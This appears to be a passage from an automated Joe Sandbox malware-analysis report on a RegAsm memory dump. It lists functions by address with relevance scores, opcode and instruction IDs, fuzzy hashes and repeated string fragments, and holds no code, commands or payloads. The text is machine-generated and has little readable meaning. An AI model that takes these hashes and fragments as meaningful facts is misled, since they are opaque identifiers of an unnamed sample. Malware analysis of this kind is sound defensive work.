                                                                                                                                                    Function 05DACE88 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 05f1986c61013029b4498d0ecc69c3671c483306c700538a7e028b8d37548dd7
                                                                                                                                                    • Instruction ID: 0fb64426cbf2abfa357e6fed4216aa7c78cb6e00f129c21856bf2d0c96cd20f4
                                                                                                                                                    • Opcode Fuzzy Hash: 05f1986c61013029b4498d0ecc69c3671c483306c700538a7e028b8d37548dd7
                                                                                                                                                    • Instruction Fuzzy Hash: ABE0C272908241DFE711F720F44AB6C3BE1E780621F548825EC01AFF88DA389C4AC782
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DAB510 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 2d5e1919efbc06f35978123061fca2ca2cd937915852993486f3530c4400c223
                                                                                                                                                    • Instruction ID: d7546fcc3f05ac624a2c54a6bf2749e1cd6d6746ca0071098fb899a28ad9f089
                                                                                                                                                    • Opcode Fuzzy Hash: 2d5e1919efbc06f35978123061fca2ca2cd937915852993486f3530c4400c223
                                                                                                                                                    • Instruction Fuzzy Hash: F8E09275D0420CEFCB40DFE5E9458DDBBB9EB48200F1082AAE809A3200EB346B55DF80
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DAE8F8 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: a96e12a56ea304f4dd2a678742072c603aeb6766733af29c300af8a339f124b6
                                                                                                                                                    • Instruction ID: 79d7af2dd591dada31abbd36fc194c2924b7af509c44c6fbf29c7e18d32f2293
                                                                                                                                                    • Opcode Fuzzy Hash: a96e12a56ea304f4dd2a678742072c603aeb6766733af29c300af8a339f124b6
                                                                                                                                                    • Instruction Fuzzy Hash: A1D0A73A120108DFC7409E54C8C2F503B78FF48704F94D0A4F5449F721C632E822DB50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DAE210 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 5c684b0e501fdb32557b3101f209972f8a0f06d6b8b0581e83d75ed9f003cbb9
                                                                                                                                                    • Instruction ID: 1dd906f25796759fcc617b3dac17352896b73c880fb4f7f840d0102e8970371d
                                                                                                                                                    • Opcode Fuzzy Hash: 5c684b0e501fdb32557b3101f209972f8a0f06d6b8b0581e83d75ed9f003cbb9
                                                                                                                                                    • Instruction Fuzzy Hash: 5FD01271E0020CFF8B00EFA4E94155D77B5DB44205B1085999408E7244DA312F049791
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DAF8EA Relevance: .0, Instructions: 15COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 5d199edb47fba760d97e618056e2a75f5e0c3d1267dd49ff25310a14a45bb1c6
                                                                                                                                                    • Instruction ID: 17601b4c7a2d38d334a5da589058decfc9cbcdbb0d882a60112408731bedbd5e
                                                                                                                                                    • Opcode Fuzzy Hash: 5d199edb47fba760d97e618056e2a75f5e0c3d1267dd49ff25310a14a45bb1c6
                                                                                                                                                    • Instruction Fuzzy Hash: 37C012323240202B0258216CF86656E66AACBC9A62389803BF50AE3344CC688C060391
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DADFD1 Relevance: .0, Instructions: 6COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: d033942627120a4a3096469fd5b58612228836ce25cb8673d32e002be3b10fb7
                                                                                                                                                    • Instruction ID: 53997ea45c475f916479ff9b8adb3f2a36aac82366d8c8f468321d5261f35b87
                                                                                                                                                    • Opcode Fuzzy Hash: d033942627120a4a3096469fd5b58612228836ce25cb8673d32e002be3b10fb7
                                                                                                                                                    • Instruction Fuzzy Hash: E9B0123944EA808FFF016764DD0F2187E70AF81B4175640C2A200CA0F3DBDC4000CE55
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Non-executed Functions

                                                                                                                                                    Function 05DAE2C7 Relevance: 46.6, Strings: 37, Instructions: 388COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j
                                                                                                                                                    • API String ID: 0-2692801833
                                                                                                                                                    • Opcode ID: 33553bbac9e7f7d782fce340cfb22384d4a42bd9c8bdf8f215b07cae9e0b9e6f
                                                                                                                                                    • Instruction ID: 37609b0fac9df4d30286ea98aee58fa7724623511892ce328de8421d8f68fc34
                                                                                                                                                    • Opcode Fuzzy Hash: 33553bbac9e7f7d782fce340cfb22384d4a42bd9c8bdf8f215b07cae9e0b9e6f
                                                                                                                                                    • Instruction Fuzzy Hash: 71D1BF347407106BD20AA7F0DC62B6CAAE7BBCA302B85843CD2155F796DF716D5A4387
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DAE2D8 Relevance: 46.6, Strings: 37, Instructions: 383COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j
                                                                                                                                                    • API String ID: 0-2692801833
                                                                                                                                                    • Opcode ID: c89fb5af714a0082ddaf45d23d53ed49a87ac9ac5dfd1476e843930daaebbaf9
                                                                                                                                                    • Instruction ID: 19da464617c87a421ecb3bc510518bb2aceb7509414422e6cbddf052a38954e6
                                                                                                                                                    • Opcode Fuzzy Hash: c89fb5af714a0082ddaf45d23d53ed49a87ac9ac5dfd1476e843930daaebbaf9
                                                                                                                                                    • Instruction Fuzzy Hash: 66D1AE347407006BD20AA7F0DC66B6DA6E7BBCA302B84843CD2190F796DF716D5A4397
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DACC7F Relevance: 16.4, Strings: 13, Instructions: 146COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j
                                                                                                                                                    • API String ID: 0-896334709
                                                                                                                                                    • Opcode ID: 7ca086a466e03fd67404e1a85f567e1b0402f17b84124d56cd63c1c986ed9cb4
                                                                                                                                                    • Instruction ID: 9b2109b75c27ab11c3660c2effe3d909b884daba90e0709ead8f3d94b97fc3c8
                                                                                                                                                    • Opcode Fuzzy Hash: 7ca086a466e03fd67404e1a85f567e1b0402f17b84124d56cd63c1c986ed9cb4
                                                                                                                                                    • Instruction Fuzzy Hash: 2C41C4343407006BD205B7F0D86272DA6ABFBC6301B44883CD2195FB86DF76AD5A439B
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DACC90 Relevance: 16.4, Strings: 13, Instructions: 143COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j
                                                                                                                                                    • API String ID: 0-896334709
                                                                                                                                                    • Opcode ID: 37c96407ffb6484ea116a0d40063def20eeb318868ea108643de0d66d68604cf
                                                                                                                                                    • Instruction ID: b85e354eb70e60938e1c6d2271fb6c34d81f8875fd5ff517d7ff77d5b01fa5ba
                                                                                                                                                    • Opcode Fuzzy Hash: 37c96407ffb6484ea116a0d40063def20eeb318868ea108643de0d66d68604cf
                                                                                                                                                    • Instruction Fuzzy Hash: BA41A3343407002BD205B7B0D86172DA6ABBBC6301B44883CD2191F785CF75AD5A439B
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DACED1 Relevance: 10.1, Strings: 8, Instructions: 100COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j
                                                                                                                                                    • API String ID: 0-4204835099
                                                                                                                                                    • Opcode ID: ac7ab2d9141bdbf9683a7d0e34262bd6cbe0cfff23e1f67b2b3929f5755860bf
                                                                                                                                                    • Instruction ID: fdb0b95bab4960de87c8acec4b02e8ced7b8ee61e77840e8d4b875002f166d1b
                                                                                                                                                    • Opcode Fuzzy Hash: ac7ab2d9141bdbf9683a7d0e34262bd6cbe0cfff23e1f67b2b3929f5755860bf
                                                                                                                                                    • Instruction Fuzzy Hash: 9431D3303003012BD605A7E0D862B2DAAABFBC6301F848838E2095F785DF757D99439B
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DACEE0 Relevance: 10.1, Strings: 8, Instructions: 93COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j
                                                                                                                                                    • API String ID: 0-4204835099
                                                                                                                                                    • Opcode ID: a1fdc8451c3e2d2f99afc563ec42df8af2296119f60a2ff9f7190c12c6f7406e
                                                                                                                                                    • Instruction ID: 2cb29a2b4237c0e242b8cf24ba9e1609139ac723bb2d7d1c9785eaa8f2880d19
                                                                                                                                                    • Opcode Fuzzy Hash: a1fdc8451c3e2d2f99afc563ec42df8af2296119f60a2ff9f7190c12c6f7406e
                                                                                                                                                    • Instruction Fuzzy Hash: 7321B1347003112BD605ABE0D861B2DAAABFBC6301B84893CE2195F785CF757D99439B
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DAC968 Relevance: 8.8, Strings: 7, Instructions: 88COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: D[j$D[j$D[j$D[j$D[j$D[j$D[j
                                                                                                                                                    • API String ID: 0-3622670538
                                                                                                                                                    • Opcode ID: 357abadcf62e3ee6f37935ceedb6c4cb0198717742a8ff970cb0414bc570ea94
                                                                                                                                                    • Instruction ID: c3eca22dfd38dee93fbdc45766e03f143d34328e08b78d64c03203d013326cf0
                                                                                                                                                    • Opcode Fuzzy Hash: 357abadcf62e3ee6f37935ceedb6c4cb0198717742a8ff970cb0414bc570ea94
                                                                                                                                                    • Instruction Fuzzy Hash: FC21D5313002466BDB01ABE0DC65A6D7BA7FB86302B04843DE5059F795DF716E8B8793
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DAC978 Relevance: 8.8, Strings: 7, Instructions: 83COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: D[j$D[j$D[j$D[j$D[j$D[j$D[j
                                                                                                                                                    • API String ID: 0-3622670538
                                                                                                                                                    • Opcode ID: 96d0431aaa2da0adaeac08aef460e9f73b65e4126d13c8ec378a93ef57732448
                                                                                                                                                    • Instruction ID: 4713b7bdeeb058af2b1e49622483441eb7ebac63e6347f4725c34e0b5c08b103
                                                                                                                                                    • Opcode Fuzzy Hash: 96d0431aaa2da0adaeac08aef460e9f73b65e4126d13c8ec378a93ef57732448
                                                                                                                                                    • Instruction Fuzzy Hash: 3C21B1303002066BDB01AFE0D865A6D7BA7FBC6302704843DE5059F795CF706E8A8B93
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DAED10 Relevance: 7.9, Strings: 6, Instructions: 374COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: (_q$(_q$(_q$(_q$(_q$(_q
                                                                                                                                                    • API String ID: 0-744050660
                                                                                                                                                    • Opcode ID: 20393f0bae7bf8cc9f83c71f7fcfff6ba8e7a8a18e2a28010edbffca76fcf2ef
                                                                                                                                                    • Instruction ID: 646163199b0f0bcff023baae536f5b308819830c7110542f21924664fda316f0
                                                                                                                                                    • Opcode Fuzzy Hash: 20393f0bae7bf8cc9f83c71f7fcfff6ba8e7a8a18e2a28010edbffca76fcf2ef
                                                                                                                                                    • Instruction Fuzzy Hash: 85D1BD35B043049FEB049F78D8256AE7BB2FF85210B14C56EE906DB381DA39DD46CB92
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DAD538 Relevance: 7.6, Strings: 6, Instructions: 79COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: D[j$D[j$D[j$D[j$D[j$D[j
                                                                                                                                                    • API String ID: 0-3294802575
                                                                                                                                                    • Opcode ID: 34b3162643dde003f061f8c60b6b3e784681b0814b6ff5775a3d6fd5a0358a86
                                                                                                                                                    • Instruction ID: df982bad383ea8b22451022d28c2f767fae3d109fe4e607048a8ec558a3e0739
                                                                                                                                                    • Opcode Fuzzy Hash: 34b3162643dde003f061f8c60b6b3e784681b0814b6ff5775a3d6fd5a0358a86
                                                                                                                                                    • Instruction Fuzzy Hash: CD21F3357403002BD205A7B0D862B2DAAABFBC6701F84C53CE2156F785DFB26D5A4397
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DAD548 Relevance: 7.6, Strings: 6, Instructions: 73COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: D[j$D[j$D[j$D[j$D[j$D[j
                                                                                                                                                    • API String ID: 0-3294802575
                                                                                                                                                    • Opcode ID: 80d8de041e0e53c20c6b7cf17e55a00b092982076277ce9c99cefa95e69c4831
                                                                                                                                                    • Instruction ID: 0502f986429ec60e383800f5c042a292d0122bf04e34602ed554e3c3df8b9e53
                                                                                                                                                    • Opcode Fuzzy Hash: 80d8de041e0e53c20c6b7cf17e55a00b092982076277ce9c99cefa95e69c4831
                                                                                                                                                    • Instruction Fuzzy Hash: 5D11A2357403102BD205ABA1D861B2DAAEBFBC6701F44853CE2195F785CFB26D6A4397
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%